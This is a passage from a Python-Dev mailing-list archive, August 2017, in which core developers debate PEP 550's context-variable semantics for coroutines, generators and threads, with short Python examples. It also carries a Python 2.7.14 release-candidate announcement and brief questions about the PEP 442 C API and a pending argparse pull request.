e.g: var = new_context_var('init') def sub(): assert var.lookup() == 'init' var.set('sub') def main(): var.set('main') thread = threading.Thread(target=sub) thread.start() thread.join() assert var.lookup() == 'main' Thanks, --francis From ethan at stoneleaf.us Sat Aug 26 17:10:47 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sat, 26 Aug 2017 14:10:47 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <8F64010A-456F-436E-AEC4-2C9C1D235488@python.org> Message-ID: <59A1E3D7.8080001@stoneleaf.us> On 08/26/2017 12:12 PM, David Mertz wrote: > I'm convinced by the new section explaining why a single value is better than a namespace. Nonetheless, it would feel > more "Pythonic" to me to create a property `ContextVariable.val` whose getter and setter was `.lookup()` and `.set()` > (or maybe `._lookup()` and `._set()`). > > Lookup might require a more complex call signature in rare cases, but the large majority of the time it would simply be > `var.val`, and that should be the preferred API IMO. That provides a nice parallel between `var.name ` > and `var.val` also. +1 to the property solution. -- ~Ethan~ From njs at pobox.com Sat Aug 26 17:09:08 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sat, 26 Aug 2017 14:09:08 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 10:25 AM, Eric Snow wrote: > With threads we have a directed graph of execution, rooted at the root > thread, branching with each new thread and merging with each .join(). > Each thread gets its own copy of each threading.local, regardless of > the relationship between branches (threads) in the execution graph. > > With async (and generators) we also have a directed graph of > execution, rooted in the calling thread, branching with each new async > call. Currently there is no equivalent to threading.local for the > async execution graph. This proposal involves adding such an > equivalent. > > However, the proposed solution isn''t quite equivalent, right? It > adds a concept of lookup on the chain of namespaces, traversing up the > execution graph back to the root. threading.local does not do this. > Furthermore, you can have more than one threading.local per thread. > From what I read in the PEP, each node in the execution graph has (at > most) one Execution Context. > > The PEP doesn't really say much about these differences from > threadlocals, including a rationale. FWIW, I think such a COW > mechanism could be useful. However, it does add complexity to the > feature. So a clear explanation in the PEP of why it's worth it would > be valuable. You might be interested in these notes I wrote to motivate why we need a chain of namespaces, and why simple "async task locals" aren't sufficient: https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb They might be a bit verbose to include directly in the PEP, but Yury/Elvis, feel free to steal whatever if you think it'd be useful. -n -- Nathaniel J. Smith -- https://vorpus.org From njs at pobox.com Sat Aug 26 19:13:24 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sat, 26 Aug 2017 16:13:24 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <2322879.hcVsH781ou@klinga.prans.org> References: <2322879.hcVsH781ou@klinga.prans.org> Message-ID: On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: > On Saturday, August 26, 2017 2:34:29 AM EDT Nathaniel Smith wrote: >> On Fri, Aug 25, 2017 at 3:32 PM, Yury Selivanov > wrote: >> > Coroutines and Asynchronous Tasks >> > --------------------------------- >> > >> > In coroutines, like in generators, context variable changes are >> > local> >> > and are not visible to the caller:: >> > import asyncio >> > >> > var = new_context_var() >> > >> > async def sub(): >> > assert var.lookup() == 'main' >> > var.set('sub') >> > assert var.lookup() == 'sub' >> > >> > async def main(): >> > var.set('main') >> > await sub() >> > assert var.lookup() == 'main' >> > >> > loop = asyncio.get_event_loop() >> > loop.run_until_complete(main()) >> >> I think this change is a bad idea. I think that generally, an async >> call like 'await async_sub()' should have the equivalent semantics >> to a synchronous call like 'sync_sub()', except for the part where >> the former is able to contain yields. Giving every coroutine an LC >> breaks that equivalence. It also makes it so in async code, you >> can't necessarily refactor by moving code in and out of >> subroutines. Like, if we inline 'sub' into 'main', that shouldn't >> change the semantics, but... > > If we could easily, we'd given each _normal function_ its own logical > context as well. I mean... you could do that. It'd be easy to do technically, right? But it would make the PEP useless, because then projects like decimal and numpy couldn't adopt it without breaking backcompat, meaning they couldn't adopt it at all. The backcompat argument isn't there in the same way for async code, because it's new and these functions have generally been broken there anyway. But it's still kinda there in spirit: there's a huge amount of collective knowledge about how (synchronous) Python code works, and IMO async code should match that whenever possible. > What we are talking about here is variable scope leaking up the call > stack. I think this is a bad pattern. For decimal context-like uses > of the EC you should always use a context manager. For uses like Web > request locals, you always have a top function that sets the context > vars. It's perfectly reasonable to have a script where you call decimal.setcontext or np.seterr somewhere at the top to set the defaults for the rest of the script. Yeah, maybe it'd be a bit cleaner to use a 'with' block wrapped around main(), and certainly in a complex app you want to stick to that, but Python isn't just used for complex apps :-). I foresee confused users trying to figure out why np.seterr suddenly stopped working when they ported their app to use async. This also seems like it makes some cases much trickier. Like, say you have an async context manager that wants to manipulate a context local. If you write 'async def __aenter__', you just lost -- it'll be isolated. I think you have to write some awkward thing like: def __aenter__(self): coro = self._real_aenter() coro.__logical_context__ = None return coro It would be really nice if libraries like urllib3/requests supported async as an option, but it's difficult because they can't drop support for synchronous operation and python 2, and we want to keep a single codebase. One option I've been exploring is to write them in "synchronous style" but with async/await keywords added, and then generating a py2-compatible version with a script that strips out async/await etc. (Like a really simple 3to2 that just works at the token level.) One transformation you'd want to apply is replacing __aenter__ -> __enter__, but this gets much more difficult if we have to worry about elaborate transformations like the above... If I have an async generator, and I set its __logical_context__ to None, then do I also have to set this attribute on every coroutine returned from calling __anext__/asend/athrow/aclose? >> >> I think I see the motivation: you want to make >> >> await sub() >> >> and >> >> await ensure_future(sub()) >> >> have the same semantics, right? And the latter has to create a Task > > What we want is for `await sub()` to be equivalent to > `await asyncio.wait_for(sub())` and to `await asyncio.gather(sub())`. I don't feel like there's any need to make gather() have exactly the same semantics as a regular call -- it's pretty clearly a task-spawning primitive that runs all of the given coroutines concurrently, so it makes sense that it would have task-spawning semantics rather than call semantics. wait_for is a more unfortunate case; there's really no reason for it to create a Task at all, except that asyncio made the decision to couple cancellation and Tasks, so if you want one then you're stuck with the other. Yury's made some comments about stealing Trio's cancellation system and adding it to asyncio -- I don't know how serious he was. If he did then it would let you use timeouts without creating a new Task, and this problem would go away. OTOH if you stick with pushing a new LC on every coroutine call, then that makes Trio's cancellation system way slower, because it has to walk the whole stack of LCs on every yield to register/unregister each cancel scope. PEP 550v4 makes that stack much deeper, plus breaks the optimization I was planning to use to let us mostly skip this entirely. (To be clear, this isn't the main reason I think these semantics are a bad idea -- the main reason is that I think async and sync code should have the same semantics. But it definitely doesn't help that it creates obstacles to improving asyncio/improving on asyncio.) > Imagine we allow context var changes to leak out of `async def`. It's > easy to write code that relies on this: > > async def init(): > var.set('foo') > > async def main(): > await init() > assert var.lookup() == 'foo' > > If we change `await init()` to `await asyncio.wait_for(init())`, the > code will break (and in real world, possibly very subtly). But instead you're making it so that it will break if the user adds/removes async/await keywords: def init(): var.set('foo') def main(): init() >> It also adds non-trivial overhead, because now lookup() is O(depth >> of async callstack), instead of O(depth of (async) generator >> nesting), which is generally much smaller. > > You would hit cache in lookup() most of the time. You've just reduced the cache hit rate too, because the cache gets invalidated on every push/pop. Presumably you'd optimize this to skip invalidating if the LC that gets pushed/popped is empty, so this isn't as catastrophic as it might initially look, but you still have to invalidate all the cached variables every time any variable gets touched and then you return from a function. Which might happen quite a bit if, for example, using timeouts involves touching the LC :-). -n -- Nathaniel J. Smith -- https://vorpus.org From benjamin at python.org Sat Aug 26 23:50:17 2017 From: benjamin at python.org (Benjamin Peterson) Date: Sat, 26 Aug 2017 20:50:17 -0700 Subject: [Python-Dev] [RELEASE] Python 2.7.14 release candidate 1 Message-ID: <1503805817.1808037.1086183896.0651D469@webmail.messagingengine.com> I'm happy to announce the immediate availability of Python 2.7.14 release candidate 1, a testing release for the latest bugfix release in the Python 2.7 series. Downloads of source code and binaries are at https://www.python.org/downloads/release/python-2714rc1/ Please consider testing the release with your libraries and applications and reporting any bugs to https://bugs.python.org A final release is expected in 3 weeks. Regards, Benjamin 2.7 release manager (on behalf of 2.7's contributors) From stefan at bytereef.org Sun Aug 27 06:08:09 2017 From: stefan at bytereef.org (Stefan Krah) Date: Sun, 27 Aug 2017 12:08:09 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <2322879.hcVsH781ou@klinga.prans.org> Message-ID: <20170827100809.GA2644@bytereef.org> On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: > On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: > > What we are talking about here is variable scope leaking up the call > > stack. I think this is a bad pattern. For decimal context-like uses > > of the EC you should always use a context manager. For uses like Web > > request locals, you always have a top function that sets the context > > vars. > > It's perfectly reasonable to have a script where you call > decimal.setcontext or np.seterr somewhere at the top to set the > defaults for the rest of the script. +100. The only thing that makes sense for decimal is to change localcontext() to be automatically async-safe while preserving the rest of the semantics. Stefan Krah From stefan at bytereef.org Sun Aug 27 06:39:42 2017 From: stefan at bytereef.org (Stefan Krah) Date: Sun, 27 Aug 2017 12:39:42 +0200 Subject: [Python-Dev] PEP 550 v4: Decimal examples and performance In-Reply-To: References: <20170826114558.GA2649@bytereef.org> Message-ID: <20170827103942.GA2643@bytereef.org> On Sat, Aug 26, 2017 at 12:21:44PM -0400, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 7:45 AM, Stefan Krah wrote: > >> This generic caching approach is similar to what the current C > >> implementation of ``decimal`` does to cache the the current decimal > >> context, and has similar performance characteristics. > > > > I think it'll work, but can we agree on hard numbers like max 2% slowdown > > for the non-threaded case and 4% for applications that only use threads? > > I'd be *very* surprised if wee see any noticeable slowdown at all. The > way ContextVars will implement caching is very similar to the trick > you use now. I'd also be surprised, but what do we do if the PEP is accepted and for some yet unknown reason the implementation turns out to be 12-15% slower? The slowdown related to the module-state/heap-type PEPs wasn't immediately obvious either; it would be nice to have actual figures before the PEP is accepted. Stefan Krah From yselivanov.ml at gmail.com Sun Aug 27 11:19:20 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Sun, 27 Aug 2017 11:19:20 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170827100809.GA2644@bytereef.org> References: <2322879.hcVsH781ou@klinga.prans.org> <20170827100809.GA2644@bytereef.org> Message-ID: On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: >> On Sat, Aug 26, 2017 at 7:58 AM, Elvis Pranskevichus wrote: >> > What we are talking about here is variable scope leaking up the call >> > stack. I think this is a bad pattern. For decimal context-like uses >> > of the EC you should always use a context manager. For uses like Web >> > request locals, you always have a top function that sets the context >> > vars. >> >> It's perfectly reasonable to have a script where you call >> decimal.setcontext or np.seterr somewhere at the top to set the >> defaults for the rest of the script. > > +100. The only thing that makes sense for decimal is to change localcontext() > to be automatically async-safe while preserving the rest of the semantics. TBH Nathaniel's argument isn't entirely correct. With the semantics defined in PEP 550 v4, you still can set decimal context on top of your file, in your async functions etc. This will work: decimal.setcontext(ctx) def foo(): # use decimal with context=ctx and this: def foo(): decimal.setcontext(ctx) # use decimal with context=ctx and this: def bar(): # use decimal with context=ctx def foo(): decimal.setcontext(ctx) bar() and this: def bar(): decimal.setcontext(ctx) def foo(): bar() # use decimal with context=ctx and this: decimal.setcontext(ctx) async def foo(): # use decimal with context=ctx and this: async def bar(): # use decimal with context=ctx async def foo(): decimal.setcontext(ctx) await bar() The only thing that will not work, is this (ex1): async def bar(): decimal.setcontext(ctx) async def foo(): await bar() # use decimal with context=ctx The reason why this one example worked in PEP 550 v3 and doesn't work in v4 is that we want to avoid random code breakage if you wrap your coroutine in a task, like here (ex2): async def bar(): decimal.setcontext(ctx) async def foo(): await wait_for(bar(), 1) # use decimal with context=ctx We want (ex1) and (ex2) to work the same way always. That's the only difference in semantics between v3 and v4, and it's the only sane one, because implicit task creation is an extremely subtle detail that most users aren't aware of. We can't have a semantics that let you easily break your code by adding a timeout in one await. Speaking of (ex1), there's an example that didn't work in any PEP 550 version: def bar(): decimal.setcontext(ctx) yield async def foo(): list(bar()) # use decimal with context=ctx In the above code, bar() generator sets some decimal context, and it will not leak outside of it. This semantics is one of PEP 550 goals. The last change just unifies this semantics for coroutines, generators, and asynchronous generators, which is a good thing. Yury From jimjjewett at gmail.com Sun Aug 27 11:51:43 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Sun, 27 Aug 2017 11:51:43 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: I think there is general consensus that this should go in a module other than sys. (At least a submodule.) The specific names are still To Be Determined, but I suspect seeing the functions and objects as part of a named module will affect what works. So I am requesting that the next iteration just pick a module name, and let us see how that looks. E.g import dynscopevars user=dynscopevars.Var ("username") myscope=dynscopevars.get_current_scope() childscope=dynscopevars.Scope (parent=myscope,user="bob") -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From jimjjewett at gmail.com Sun Aug 27 12:00:51 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Sun, 27 Aug 2017 12:00:51 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: Does setting an ImplicitScopeVar to None set the value to None, or just remove it? If it removes it, does that effectively unmask a previously masked value? If it really sets to None, then is there a way to explicitly unmask previously masked values? Perhaps the initial constructor should require an initial value (defaulting to None) and the docs should give examples both for using a sensible default value and for using a special "unset" marker. -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From chris.jerdonek at gmail.com Sun Aug 27 14:02:50 2017 From: chris.jerdonek at gmail.com (Chris Jerdonek) Date: Sun, 27 Aug 2017 18:02:50 +0000 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: Hi Jim, it seems like each time you reply you change the subject line and start a new thread. Very few others are doing this (e.g. Yury when releasing a new version). Would it be possible for you to preserve the threading like others? --Chris On Sun, Aug 27, 2017 at 9:08 AM Jim J. Jewett wrote: > Does setting an ImplicitScopeVar to None set the value to None, or just > remove it? > > If it removes it, does that effectively unmask a previously masked value? > > If it really sets to None, then is there a way to explicitly unmask > previously masked values? > > Perhaps the initial constructor should require an initial value > (defaulting to None) and the docs should give examples both for using a > sensible default value and for using a special "unset" marker. > > -jJ > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/chris.jerdonek%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ethan at stoneleaf.us Sun Aug 27 15:12:00 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Sun, 27 Aug 2017 12:12:00 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: <59A31980.5040302@stoneleaf.us> On 08/27/2017 11:02 AM, Chris Jerdonek wrote: > Hi Jim, it seems like each time you reply you change the subject line and start a new thread. Very few others are doing > this (e.g. Yury when releasing a new version). Would it be possible for you to preserve the threading like others? I must admit I'm torn here: on the one hand, having all the discussion in a single thread keeps the conversation in one place; on the other hand, having separate threads for very specific questions makes it easier to focus on the parts one is interested in without being overwhelmed by the volume. So while I'm okay either way, I do appreciate Jim trying to have focused threads. -- ~Ethan~ From njs at pobox.com Sun Aug 27 16:01:45 2017 From: njs at pobox.com (Nathaniel Smith) Date: Sun, 27 Aug 2017 13:01:45 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: I believe that the current status is: - assigning None isn't treated specially ? it does mask any underlying values (which I think is what we want) - there is currently no way to "unmask" - but it's generally agreed that there should be a way to do that, at least in some cases, to handle the save/restore issue I raised. It's just that Yury & Elvis wanted to deal with restructuring the PEP first before doing more work on the api details. -n On Aug 27, 2017 9:08 AM, "Jim J. Jewett" wrote: > Does setting an ImplicitScopeVar to None set the value to None, or just > remove it? > > If it removes it, does that effectively unmask a previously masked value? > > If it really sets to None, then is there a way to explicitly unmask > previously masked values? > > Perhaps the initial constructor should require an initial value > (defaulting to None) and the docs should give examples both for using a > sensible default value and for using a special "unset" marker. > > -jJ > > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > njs%40pobox.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From songofacandy at gmail.com Mon Aug 28 02:49:17 2017 From: songofacandy at gmail.com (INADA Naoki) Date: Mon, 28 Aug 2017 15:49:17 +0900 Subject: [Python-Dev] PEP 442 undocumented C API functions In-Reply-To: <1503729060.5586.5.camel@iki.fi> References: <1503729060.5586.5.camel@iki.fi> Message-ID: Hi, thanks to your report. > As far as I understand, if you have a custom tp_dealloc, you *have* to > call PyObject_CallFinalizerFromDealloc in order to get your tp_finalize > called. Is this correct? Sorry, I'm not expert of Object finalization process. But If my understanding is correct, you're almost right. When a type has custom *tp_finalize*, it have to call `PyObject_CallFinalizerFromDealloc`. And to allow subclass, it should be like this: https://github.com/python/cpython/blob/ed94a8b2851914bcda3a77b28b25517b8baa91e6/Modules/_asynciomodule.c#L1836-L1849 > However, since the necessary functions are undocumented, it's unclear > if they were intended to be public Python API functions. So are they > actually public functions that 3rd party extensions can call? > If not, how is tp_finalize supposed to be used? While I don't want tp_finalize is used widely (like `__del__`), I agree with you. But I'm not good English writer. Contribution is welcome. Regards, INADA Naoki From stefan at bytereef.org Mon Aug 28 07:19:03 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 13:19:03 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <20170828111903.GA3032@bytereef.org> On Sun, Aug 27, 2017 at 11:19:20AM -0400, Yury Selivanov wrote: > On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: > > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: > >> It's perfectly reasonable to have a script where you call > >> decimal.setcontext or np.seterr somewhere at the top to set the > >> defaults for the rest of the script. > > > > +100. The only thing that makes sense for decimal is to change localcontext() > > to be automatically async-safe while preserving the rest of the semantics. > > TBH Nathaniel's argument isn't entirely correct. > > With the semantics defined in PEP 550 v4, you still can set decimal > context on top of your file, in your async functions etc. > > and this: > > def bar(): > decimal.setcontext(ctx) > > def foo(): > bar() > # use decimal with context=ctx Okay, so if I understand this correctly we actually will not have dynamic scoping for regular functions: bar() has returned, so the new context would not be found on the stack with proper dynamic scoping. > and this: > > async def bar(): > # use decimal with context=ctx > > async def foo(): > decimal.setcontext(ctx) > await bar() > > The only thing that will not work, is this (ex1): > > async def bar(): > decimal.setcontext(ctx) > > async def foo(): > await bar() > # use decimal with context=ctx Here we do have dynamic scoping. > Speaking of (ex1), there's an example that didn't work in any PEP 550 version: > > def bar(): > decimal.setcontext(ctx) > yield > > async def foo(): > list(bar()) > # use decimal with context=ctx What about this? async def bar(): setcontext(Context(prec=1)) for i in range(10): await asyncio.sleep(1) yield i async def foo(): async for i in bar(): # ctx.prec=1? print(Decimal(100) / 3) I'm searching for some abstract model to reason about the scopes. Stefan Krah From jsbueno at python.org.br Mon Aug 28 10:17:46 2017 From: jsbueno at python.org.br (Joao S. O. Bueno) Date: Mon, 28 Aug 2017 11:17:46 -0300 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: Well, this talk may be a bit of bike-shedding, but +1 for a separate module/sub module And full -1 for something named "dynscopevars" That word is unreadable, barely mnemonic, but plain "ugly" - (I know that this is subjective, but it is just that :-) ) Why not just "execution_context" or "sys.execution_context" ? "from execution_context import Var, lookup, set, LogicalContext, run_with " On 27 August 2017 at 12:51, Jim J. Jewett wrote: > I think there is general consensus that this should go in a module other > than sys. (At least a submodule.) > > The specific names are still To Be Determined, but I suspect seeing the > functions and objects as part of a named module will affect what works. > > So I am requesting that the next iteration just pick a module name, and > let us see how that looks. E.g > > import dynscopevars > > user=dynscopevars.Var ("username") > > myscope=dynscopevars.get_current_scope() > > childscope=dynscopevars.Scope (parent=myscope,user="bob") > > > -jJ > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > jsbueno%40python.org.br > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From robert at shajil.de Mon Aug 28 03:42:55 2017 From: robert at shajil.de (Robert Schindler) Date: Mon, 28 Aug 2017 09:42:55 +0200 Subject: [Python-Dev] [bpo-30421]: Pull request review Message-ID: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Hello, In May, I submitted a pull request that extends the functionality of argparse.ArgumentParser. To do so, I followed the steps described in the developers guide. According to [1], I already pinged at GitHub but got no response. The next step seems to be writing to this list. I know that nobody is payed for reviewing submissions, but maybe it just got overlooked? You can find the pull request at [2]. Thanks in advance for any feedback. Best regards Robert [1] https://docs.python.org/devguide/pullrequest.html#reviewing [2] https://github.com/python/cpython/pull/1698 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: not available URL: From yselivanov.ml at gmail.com Mon Aug 28 11:23:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:23:12 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828111903.GA3032@bytereef.org> References: <20170828111903.GA3032@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 7:19 AM, Stefan Krah wrote: > On Sun, Aug 27, 2017 at 11:19:20AM -0400, Yury Selivanov wrote: >> On Sun, Aug 27, 2017 at 6:08 AM, Stefan Krah wrote: >> > On Sat, Aug 26, 2017 at 04:13:24PM -0700, Nathaniel Smith wrote: >> >> It's perfectly reasonable to have a script where you call >> >> decimal.setcontext or np.seterr somewhere at the top to set the >> >> defaults for the rest of the script. >> > >> > +100. The only thing that makes sense for decimal is to change localcontext() >> > to be automatically async-safe while preserving the rest of the semantics. >> >> TBH Nathaniel's argument isn't entirely correct. >> >> With the semantics defined in PEP 550 v4, you still can set decimal >> context on top of your file, in your async functions etc. >> >> and this: >> >> def bar(): >> decimal.setcontext(ctx) >> >> def foo(): >> bar() >> # use decimal with context=ctx > > Okay, so if I understand this correctly we actually will not have dynamic > scoping for regular functions: bar() has returned, so the new context > would not be found on the stack with proper dynamic scoping. Correct. Although I would avoid associating PEP 550 with dynamic scoping entirely, as we never intended to implement it. [..] > What about this? > > async def bar(): > setcontext(Context(prec=1)) > for i in range(10): > await asyncio.sleep(1) > yield i > > async def foo(): > async for i in bar(): > # ctx.prec=1? > print(Decimal(100) / 3) > > > > I'm searching for some abstract model to reason about the scopes. Whatever is set in coroutines, generators, and async generators does not leak out. In the above example, "prec=1" will only be set inside "bar()", and "foo()" will not see that. (Same will happen for a regular function and a generator). Yury From ethan at stoneleaf.us Mon Aug 28 11:26:55 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Mon, 28 Aug 2017 08:26:55 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828111903.GA3032@bytereef.org> References: <20170828111903.GA3032@bytereef.org> Message-ID: <59A4363F.8040003@stoneleaf.us> On 08/28/2017 04:19 AM, Stefan Krah wrote: > What about this? > > async def bar(): > setcontext(Context(prec=1)) > for i in range(10): > await asyncio.sleep(1) > yield i > > async def foo(): > async for i in bar(): > # ctx.prec=1? > print(Decimal(100) / 3) If I understand correctly, ctx.prec is whatever the default is, because foo comes before bar on the stack, and after the current value for i is grabbed bar is no longer executing, and therefore no longer on the stack. I hope I'm right. ;) -- ~Ethan~ From yselivanov.ml at gmail.com Mon Aug 28 11:26:51 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:26:51 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <67011615-0c66-b610-6887-052ff65c97f1@email.de> References: <67011615-0c66-b610-6887-052ff65c97f1@email.de> Message-ID: On Sat, Aug 26, 2017 at 4:45 PM, francismb wrote: [..] > it's by design that the execution context for new threads to be empty or > should it be possible to set it to some initial value? Like e.g: > > var = new_context_var('init') > > def sub(): > assert var.lookup() == 'init' > var.set('sub') > > def main(): > var.set('main') > > thread = threading.Thread(target=sub) > thread.start() > thread.join() > > assert var.lookup() == 'main' Yes, it's by design. With PEP 550 APIs it's easy to subclass threading.Thread or concurrent.futures.ThreadPool to make them capture the EC. Yury From yselivanov.ml at gmail.com Mon Aug 28 11:29:41 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:29:41 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A4363F.8040003@stoneleaf.us> References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 11:26 AM, Ethan Furman wrote: > On 08/28/2017 04:19 AM, Stefan Krah wrote: > >> What about this? >> >> async def bar(): >> setcontext(Context(prec=1)) >> for i in range(10): >> await asyncio.sleep(1) >> yield i >> >> async def foo(): >> async for i in bar(): >> # ctx.prec=1? >> print(Decimal(100) / 3) > > > If I understand correctly, ctx.prec is whatever the default is, because foo > comes before bar on the stack, and after the current value for i is grabbed > bar is no longer executing, and therefore no longer on the stack. I hope > I'm right. ;) You're right! Yury From yselivanov.ml at gmail.com Mon Aug 28 11:50:04 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 11:50:04 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: On Sun, Aug 27, 2017 at 4:01 PM, Nathaniel Smith wrote: > I believe that the current status is: > > - assigning None isn't treated specially ? it does mask any underlying > values (which I think is what we want) Correct. > > - there is currently no way to "unmask" > > - but it's generally agreed that there should be a way to do that, at least > in some cases, to handle the save/restore issue I raised. It's just that > Yury & Elvis wanted to deal with restructuring the PEP first before doing > more work on the api details. Yes. I think it's a good time to start a discussion about this, I can list a couple ideas here. For checking if a context variable has a value in the topmost LC, we can add two new keyword arguments to the "ContextVar.lookup()" method: ContextVar.lookup(*, default=None, topmost=False) If `topmost` is set to `True`, `lookup` will only check the topmost LC. For deleting a value from the topmost LC we can add a new "ContextVar.delete()" method. Yury From stefan at bytereef.org Mon Aug 28 11:52:15 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 17:52:15 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> Message-ID: <20170828155215.GA3763@bytereef.org> On Mon, Aug 28, 2017 at 11:23:12AM -0400, Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 7:19 AM, Stefan Krah wrote: > > Okay, so if I understand this correctly we actually will not have dynamic > > scoping for regular functions: bar() has returned, so the new context > > would not be found on the stack with proper dynamic scoping. > > Correct. Although I would avoid associating PEP 550 with dynamic > scoping entirely, as we never intended to implement it. Good, I agree it does not make sense. > [..] > > What about this? > > > > async def bar(): > > setcontext(Context(prec=1)) > > for i in range(10): > > await asyncio.sleep(1) > > yield i > > > > async def foo(): > > async for i in bar(): > > # ctx.prec=1? > > print(Decimal(100) / 3) > > > > > > > > I'm searching for some abstract model to reason about the scopes. > > Whatever is set in coroutines, generators, and async generators does > not leak out. In the above example, "prec=1" will only be set inside > "bar()", and "foo()" will not see that. (Same will happen for a > regular function and a generator). But the state "leaks in" as per your previous example: async def bar(): # use decimal with context=ctx async def foo(): decimal.setcontext(ctx) await bar() IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, as I see it, there's still some mixture between dynamic scoping and CLS because it this example bar() is allowed to search the stack. Stefan Krah From levkivskyi at gmail.com Mon Aug 28 11:53:53 2017 From: levkivskyi at gmail.com (Ivan Levkivskyi) Date: Mon, 28 Aug 2017 17:53:53 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: A question appeared here about a simple mental model for PEP 550. It looks much clearer now, than in the first version, but I still would like to clarify: can one say that PEP 550 just provides more fine-grained version of threading.local(), that works not only per thread, but even per coroutine within the same thread? -- Ivan On 28 August 2017 at 17:29, Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 11:26 AM, Ethan Furman wrote: > > On 08/28/2017 04:19 AM, Stefan Krah wrote: > > > >> What about this? > >> > >> async def bar(): > >> setcontext(Context(prec=1)) > >> for i in range(10): > >> await asyncio.sleep(1) > >> yield i > >> > >> async def foo(): > >> async for i in bar(): > >> # ctx.prec=1? > >> print(Decimal(100) / 3) > > > > > > If I understand correctly, ctx.prec is whatever the default is, because > foo > > comes before bar on the stack, and after the current value for i is > grabbed > > bar is no longer executing, and therefore no longer on the stack. I hope > > I'm right. ;) > > You're right! > > Yury > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > levkivskyi%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 28 12:12:00 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 12:12:00 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828155215.GA3763@bytereef.org> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 11:52 AM, Stefan Krah wrote: [..] > But the state "leaks in" as per your previous example: > > async def bar(): > # use decimal with context=ctx > > async def foo(): > decimal.setcontext(ctx) > await bar() > > > IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, > as I see it, there's still some mixture between dynamic scoping and CLS > because it this example bar() is allowed to search the stack. The whole proposal will then be mostly useless. If we forget about the dynamic scoping (I don't know why it's being brought up all the time, TBH; nobody uses it, almost no language implements it) the current proposal is well balanced and solves multiple problems. Three points listed in the rationale section: * Context managers like 